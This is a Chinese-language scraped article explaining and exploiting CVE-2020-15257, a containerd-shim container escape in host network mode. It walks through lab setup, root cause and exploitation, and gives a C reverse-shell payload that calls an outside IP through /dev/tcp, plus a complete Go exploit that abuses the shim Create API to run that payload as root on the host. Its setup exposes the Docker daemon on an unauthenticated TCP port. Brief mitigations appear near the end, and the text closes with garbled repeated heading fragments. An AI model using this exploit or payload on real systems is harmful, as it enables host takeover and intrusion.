CVE-2020-15257 Host模式容器逃逸漏洞分析与利用指南<\/h1>

1. 漏洞概述<\/h2>
CVE-2020-15257是containerd中的一个安全漏洞，影响使用`--net=host<\/code>网络模式的容器。该漏洞允许容器内的攻击者通过containerd-shim API实现容器逃逸，获取宿主机root权限。<\/p>`

2. 基础知识<\/h2>
2.1 容器攻击面<\/h3>
容器共有7个主要攻击面：<\/p>

Linux Kernel<\/li>
Namespace\/Cgroups\/Aufs<\/li>
Seccomp-bpf<\/li>
Libs<\/li>
Language VM<\/li>
User Code<\/li>
Container(Docker) engine<\/li>
<\/ul>
2.2 containerd架构<\/h3>
Dockerd通过containerd的API接口管理容器，containerd是Dockerd和runc之间的中间组件，主要负责：<\/p>

容器运行<\/li>
镜像管理<\/li>
<\/ul>
架构层次：<\/p>

Dockerd (上层)<\/li>
containerd (中间层，提供gRPC接口)<\/li>
containerd-shim (与runc结合创建运行容器)<\/li>
<\/ol>
2.3 OCI Bundle<\/h3>
OCI Bundle是符合OCI标准的一系列文件，包含运行容器所需的所有数据：<\/p>

config.json<\/code>：容器运行的配置数据<\/li>
容器的root filesystem<\/li>
<\/ul>
3. 漏洞环境搭建<\/h2>
3.1 主机环境要求<\/h3>

操作系统：Ubuntu 18.04.1 LTS<\/li>
内核版本：4.15.0-47-generic<\/li>
<\/ul>
3.2 安装特定版本组件<\/h3>


安装Docker 18.09.0<\/strong>：<\/p>
wget https:\/\/download.docker.com\/linux\/static\/stable\/x86_64\/docker-18.09.0.tgz
<\/span><\/span>tar xvpf docker-18.09.0.tgz
<\/span><\/span>sudo cp -p docker\/* \/usr\/bin
<\/span><\/span><\/code><\/pre><\/li>

配置docker.service文件<\/strong>：<\/p>
[Unit]<\/span>
<\/span><\/span>Description<\/span>=<\/span>Docker Application Container Engine<\/span>
<\/span><\/span>Documentation<\/span>=<\/span>http:\/\/docs.docker.com<\/span>
<\/span><\/span>After<\/span>=<\/span>network.target docker.socket<\/span>
<\/span><\/span>
<\/span><\/span>[Service]<\/span>
<\/span><\/span>Type<\/span>=<\/span>notify<\/span>
<\/span><\/span>EnvironmentFile<\/span>=<\/span>-\/run\/flannel\/docker<\/span>
<\/span><\/span>WorkingDirectory<\/span>=<\/span>\/usr\/local\/bin<\/span>
<\/span><\/span>ExecStart<\/span>=<\/span>\/usr\/bin\/dockerd -H tcp:\/\/0.0.0.0:4243 -H unix:\/\/\/var\/run\/docker.sock --selinux-enabled=false --log-opt max-size=1g<\/span>
<\/span><\/span>ExecReload<\/span>=<\/span>\/bin\/kill -s HUP $MAINPID<\/span>
<\/span><\/span>LimitNOFILE<\/span>=<\/span>infinity<\/span>
<\/span><\/span>LimitNPROC<\/span>=<\/span>infinity<\/span>
<\/span><\/span>LimitCORE<\/span>=<\/span>infinity<\/span>
<\/span><\/span>Delegate<\/span>=<\/span>yes<\/span>
<\/span><\/span>KillMode<\/span>=<\/span>process<\/span>
<\/span><\/span>Restart<\/span>=<\/span>on-failure<\/span>
<\/span><\/span>
<\/span><\/span>[Install]<\/span>
<\/span><\/span>WantedBy<\/span>=<\/span>multi-user.target<\/span>
<\/span><\/span><\/code><\/pre><\/li>

启动Docker服务<\/strong>：<\/p>
systemctl daemon-reload
<\/span><\/span>systemctl restart docker
<\/span><\/span>systemctl enable docker
<\/span><\/span><\/code><\/pre><\/li>

安装containerd 1.3.7<\/strong>：<\/p>
sudo apt install containerd.io=<\/span>1.3.7-1
<\/span><\/span><\/code><\/pre><\/li>

安装Go语言环境<\/strong>：<\/p>
sudo apt install golang
<\/span><\/span><\/code><\/pre><\/li>

拉取Ubuntu镜像<\/strong>：<\/p>
sudo docker pull ubuntu:18.04
<\/span><\/span><\/code><\/pre><\/li>

运行测试容器<\/strong>：<\/p>
sudo docker run -ti --rm --network=<\/span>host <IMAGE_ID>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
4. 漏洞分析<\/h2>
4.1 漏洞成因<\/h3>
当容器以--net=host<\/code>模式启动时，会暴露containerd-shim监听的Unix域套接字。这些套接字位于：<\/p>
@\/containerd-shim\/{sha256}.sock
<\/code><\/pre>
关键问题：<\/p>

这些抽象Unix域套接字没有使用mnt命名空间隔离<\/li>
仅依赖网络命名空间隔离<\/li>
攻击者可通过containerd-shim API进行操作实现逃逸<\/li>
<\/ol>
4.2 containerd-shim API<\/h3>
可调用的API包括：<\/p>
service<\/span> Shim<\/span> {
<\/span><\/span>    rpc<\/span> State<\/span>(StateRequest<\/span>) returns<\/span> (StateResponse<\/span>);
<\/span><\/span>    rpc<\/span> Create<\/span>(CreateTaskRequest<\/span>) returns<\/span> (CreateTaskResponse<\/span>);
<\/span><\/span>    rpc<\/span> Start<\/span>(StartRequest<\/span>) returns<\/span> (StartResponse<\/span>);
<\/span><\/span>    rpc<\/span> Delete<\/span>(google<\/span>.protobuf<\/span>.Empty<\/span>) returns<\/span> (DeleteResponse<\/span>);
<\/span><\/span>    \/\/ ...其他API...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>4.3 关键利用点<\/h3>
Create<\/code> API相当于执行runc create<\/code>，可以读取config.json<\/code>配置创建新容器。特别重要的是stdout<\/code>参数支持多种协议，包括：<\/p>
binary:\/\/\/bin\/sh?-c=<command>
<\/code><\/pre>
5. 漏洞利用<\/h2>
5.1 利用步骤<\/h3>


获取必要信息<\/strong>：<\/p>

容器ID：从\/proc\/self\/cgroup<\/code>获取<\/li>
宿主机存储路径：从\/etc\/mtab<\/code>获取<\/li>
<\/ul>
<\/li>

准备Payload<\/strong>：<\/p>

编写反弹shell的C程序并编译<\/li>
<\/ul>
#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    system("\/bin\/sh -i >& \/dev\/tcp\/192.168.148.135\/1337 0>&1"<\/span>);
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
将编译后的程序放在容器根目录（对应宿主机路径）<\/li>
<\/ul>
<\/li>

利用Create API执行Payload<\/strong>：<\/p>
r<\/span>, err<\/span> :=<\/span> shimClient<\/span>.Create<\/span>(ctx<\/span>, &<\/span>shimapi<\/span>.CreateTaskRequest<\/span>{
<\/span><\/span>    ID<\/span>: docker_id<\/span>,
<\/span><\/span>    Bundle<\/span>: "\/run\/containerd\/io.containerd.runtime.v1.linux\/moby\/"<\/span>+<\/span>docker_id<\/span>+<\/span>"\/config.json"<\/span>,
<\/span><\/span>    Runtime<\/span>: "io.containerd.runtime.v1.linux"<\/span>,
<\/span><\/span>    Stdin<\/span>: "anything"<\/span>,
<\/span><\/span>    Stdout<\/span>: "binary:\/\/\/bin\/sh?-c="<\/span>+<\/span>payload_path<\/span>+<\/span>"nc"<\/span>,
<\/span><\/span>    Stderr<\/span>: "anything"<\/span>,
<\/span><\/span>    Terminal<\/span>: false<\/span>,
<\/span><\/span>    Checkpoint<\/span>: "anything"<\/span>,
<\/span><\/span>})
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
5.2 完整利用代码<\/h3>
package<\/span> main<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> (
<\/span><\/span>    "context"<\/span>
<\/span><\/span>    "errors"<\/span>
<\/span><\/span>    "io\/ioutil"<\/span>
<\/span><\/span>    "log"<\/span>
<\/span><\/span>    "net"<\/span>
<\/span><\/span>    "regexp"<\/span>
<\/span><\/span>    "strings"<\/span>
<\/span><\/span>
<\/span><\/span>    "github.com\/containerd\/ttrpc"<\/span>
<\/span><\/span>    shimapi<\/span> "github.com\/containerd\/containerd\/runtime\/v1\/shim\/v1"<\/span>
<\/span><\/span>)
<\/span><\/span>
<\/span><\/span>func<\/span> getDockerID<\/span>() (string<\/span>, error<\/span>) {
<\/span><\/span>    re<\/span>, err<\/span> :=<\/span> regexp<\/span>.Compile<\/span>("pids:\/docker\/.*"<\/span>)
<\/span><\/span>    if<\/span> err<\/span> !=<\/span> nil<\/span> {
<\/span><\/span>        return<\/span> ""<\/span>, err<\/span>
<\/span><\/span>    }
<\/span><\/span>    data<\/span>, err<\/span> :=<\/span> ioutil<\/span>.ReadFile<\/span>("\/proc\/self\/cgroup"<\/span>)
<\/span><\/span>    matches<\/span> :=<\/span> re<\/span>.FindAll<\/span>(data<\/span>, -<\/span>1<\/span>)
<\/span><\/span>    if<\/span> matches<\/span> ==<\/span> nil<\/span> {
<\/span><\/span>        return<\/span> ""<\/span>, errors<\/span>.New<\/span>("Cannot find docker id"<\/span>)
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    tmp_docker_id<\/span> :=<\/span> matches<\/span>[0<\/span>]
<\/span><\/span>    docker_id<\/span> :=<\/span> string(tmp_docker_id<\/span>[13<\/span> : len(tmp_docker_id<\/span>)])
<\/span><\/span>    return<\/span> docker_id<\/span>, nil<\/span>
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>func<\/span> getMergedPath<\/span>() (string<\/span>, error<\/span>) {
<\/span><\/span>    re<\/span>, err<\/span> :=<\/span> regexp<\/span>.Compile<\/span>("workdir=.*"<\/span>)
<\/span><\/span>    if<\/span> err<\/span> !=<\/span> nil<\/span> {
<\/span><\/span>        return<\/span> ""<\/span>, err<\/span>
<\/span><\/span>    }
<\/span><\/span>    data<\/span>, err<\/span> :=<\/span> ioutil<\/span>.ReadFile<\/span>("\/etc\/mtab"<\/span>)
<\/span><\/span>    matches<\/span> :=<\/span> re<\/span>.FindAll<\/span>(data<\/span>, -<\/span>1<\/span>)
<\/span><\/span>    if<\/span> matches<\/span> ==<\/span> nil<\/span> {
<\/span><\/span>        return<\/span> ""<\/span>, errors<\/span>.New<\/span>("Cannot find merged path"<\/span>)
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    tmp_path<\/span> :=<\/span> matches<\/span>[0<\/span>]
<\/span><\/span>    path<\/span> :=<\/span> string(tmp_path<\/span>[8<\/span> : len(tmp_path<\/span>)-<\/span>8<\/span>])
<\/span><\/span>    merged<\/span> :=<\/span> path<\/span> +<\/span> "merged\/"<\/span>
<\/span><\/span>    return<\/span> merged<\/span>, nil<\/span>
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>func<\/span> getShimSockets<\/span>() ([][]byte<\/span>, error<\/span>) {
<\/span><\/span>    re<\/span>, err<\/span> :=<\/span> regexp<\/span>.Compile<\/span>("@\/containerd-shim\/.*\\.sock"<\/span>)
<\/span><\/span>    if<\/span> err<\/span> !=<\/span> nil<\/span> {
<\/span><\/span>        return<\/span> nil<\/span>, err<\/span>
<\/span><\/span>    }
<\/span><\/span>    data<\/span>, err<\/span> :=<\/span> ioutil<\/span>.ReadFile<\/span>("\/proc\/net\/unix"<\/span>)
<\/span><\/span>    matches<\/span> :=<\/span> re<\/span>.FindAll<\/span>(data<\/span>, -<\/span>1<\/span>)
<\/span><\/span>    if<\/span> matches<\/span> ==<\/span> nil<\/span> {
<\/span><\/span>        return<\/span> nil<\/span>, errors<\/span>.New<\/span>("Cannot find vulnerable socket"<\/span>)
<\/span><\/span>    }
<\/span><\/span>    return<\/span> matches<\/span>, nil<\/span>
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>func<\/span> exp<\/span>(sock<\/span> string<\/span>, docker_id<\/span> string<\/span>, payload_path<\/span> string<\/span>) bool<\/span> {
<\/span><\/span>    sock<\/span> = strings<\/span>.Replace<\/span>(sock<\/span>, "@"<\/span>, ""<\/span>, -<\/span>1<\/span>)
<\/span><\/span>    conn<\/span>, err<\/span> :=<\/span> net<\/span>.Dial<\/span>("unix"<\/span>, "\x00"<\/span>+<\/span>sock<\/span>)
<\/span><\/span>    if<\/span> err<\/span> !=<\/span> nil<\/span> {
<\/span><\/span>        log<\/span>.Println<\/span>(err<\/span>)
<\/span><\/span>        return<\/span> false<\/span>
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    client<\/span> :=<\/span> ttrpc<\/span>.NewClient<\/span>(conn<\/span>)
<\/span><\/span>    shimClient<\/span> :=<\/span> shimapi<\/span>.NewShimClient<\/span>(client<\/span>)
<\/span><\/span>
<\/span><\/span>    ctx<\/span> :=<\/span> context<\/span>.Background<\/span>()
<\/span><\/span>    md<\/span> :=<\/span> ttrpc<\/span>.MD<\/span>{} 
<\/span><\/span>    md<\/span>.Set<\/span>("containerd-namespace-ttrpc"<\/span>, "notmoby"<\/span>)
<\/span><\/span>    ctx<\/span> = ttrpc<\/span>.WithMetadata<\/span>(ctx<\/span>, md<\/span>)
<\/span><\/span>
<\/span><\/span>    r<\/span>, err<\/span> :=<\/span> shimClient<\/span>.Create<\/span>(ctx<\/span>, &<\/span>shimapi<\/span>.CreateTaskRequest<\/span>{
<\/span><\/span>        ID<\/span>: docker_id<\/span>,
<\/span><\/span>        Bundle<\/span>: "\/run\/containerd\/io.containerd.runtime.v1.linux\/moby\/"<\/span>+<\/span>docker_id<\/span>+<\/span>"\/config.json"<\/span>,
<\/span><\/span>        Runtime<\/span>: "io.containerd.runtime.v1.linux"<\/span>,
<\/span><\/span>        Stdin<\/span>: "anything"<\/span>,
<\/span><\/span>        Stdout<\/span>: "binary:\/\/\/bin\/sh?-c="<\/span>+<\/span>payload_path<\/span>+<\/span>"nc"<\/span>,
<\/span><\/span>        Stderr<\/span>: "anything"<\/span>,
<\/span><\/span>        Terminal<\/span>: false<\/span>,
<\/span><\/span>        Checkpoint<\/span>: "anything"<\/span>,
<\/span><\/span>    })
<\/span><\/span>
<\/span><\/span>    if<\/span> err<\/span> !=<\/span> nil<\/span> {
<\/span><\/span>        log<\/span>.Println<\/span>(err<\/span>)
<\/span><\/span>        return<\/span> false<\/span>
<\/span><\/span>    }
<\/span><\/span>    log<\/span>.Println<\/span>(r<\/span>)
<\/span><\/span>    return<\/span> true<\/span>
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>func<\/span> main<\/span>() {
<\/span><\/span>    matchset<\/span> :=<\/span> make(map<\/span>[string<\/span>]bool<\/span>)
<\/span><\/span>    socks<\/span>, err<\/span> :=<\/span> getShimSockets<\/span>()
<\/span><\/span>
<\/span><\/span>    docker_id<\/span>, err<\/span> :=<\/span> getDockerID<\/span>()
<\/span><\/span>    log<\/span>.Println<\/span>("find docker id:"<\/span>, docker_id<\/span>)
<\/span><\/span>
<\/span><\/span>    merged_path<\/span>, err<\/span> :=<\/span> getMergedPath<\/span>()
<\/span><\/span>    log<\/span>.Println<\/span>("find path:"<\/span>, merged_path<\/span>)
<\/span><\/span>
<\/span><\/span>    if<\/span> err<\/span> !=<\/span> nil<\/span> {
<\/span><\/span>        log<\/span>.Fatalln<\/span>(err<\/span>)
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    for<\/span> _<\/span>, b<\/span> :=<\/span> range<\/span> socks<\/span> {
<\/span><\/span>        sockname<\/span> :=<\/span> string(b<\/span>)
<\/span><\/span>        if<\/span> _<\/span>, ok<\/span> :=<\/span> matchset<\/span>[sockname<\/span>]; ok<\/span> {
<\/span><\/span>            continue<\/span>
<\/span><\/span>        }
<\/span><\/span>        log<\/span>.Println<\/span>("try socket:"<\/span>, sockname<\/span>)
<\/span><\/span>        matchset<\/span>[sockname<\/span>] = true<\/span>
<\/span><\/span>        if<\/span> exp<\/span>(sockname<\/span>, docker_id<\/span>, merged_path<\/span>) {
<\/span><\/span>            break<\/span>
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    return<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>6. 防御措施<\/h2>

升级containerd<\/strong>：升级到修复版本(1.3.9或1.4.3及以上)<\/li>
避免使用host网络模式<\/strong>：除非绝对必要<\/li>
实施命名空间隔离<\/strong>：确保正确配置命名空间<\/li>
限制容器权限<\/strong>：遵循最小权限原则<\/li>
<\/ol>
7. 参考资源<\/h2>

NCC Group技术分析<\/a><\/li>
漏洞PoC<\/a><\/li>
containerd架构<\/a><\/li>
抽象Unix域套接字分析<\/a><\/li>
<\/ol>
CVE-2020-15257 Host模式容器逃逸漏洞分析与利用指南<\/h1>

1. 漏洞概述<\/h2> CVE-2020-15257是containerd中的一个安全漏洞，影响使用--net=host<\/code>网络模式的容器。该漏洞允许容器内的攻击者通过containerd-shim API实现容器逃逸，获取宿主机root权限。<\/p>

3. 漏洞环境搭建<\/h2>

4. 漏洞分析<\/h2>

5. 漏洞利用<\/h2>

7. 参考资源<\/h2> NCC Group技术分析<\/a><\/li> 漏洞PoC<\/a><\/li> containerd架构<\/a><\/li> 抽象Unix域套接字分析<\/a><\/li> <\/ol>

1. 漏洞概述<\/h2>
CVE-2020-15257是containerd中的一个安全漏洞，影响使用`--net=host<\/code>网络模式的容器。该漏洞允许容器内的攻击者通过containerd-shim API实现容器逃逸，获取宿主机root权限。<\/p>`

7. 参考资源<\/h2>

NCC Group技术分析<\/a><\/li>
漏洞PoC<\/a><\/li>
containerd架构<\/a><\/li>
抽象Unix域套接字分析<\/a><\/li> <\/ol>
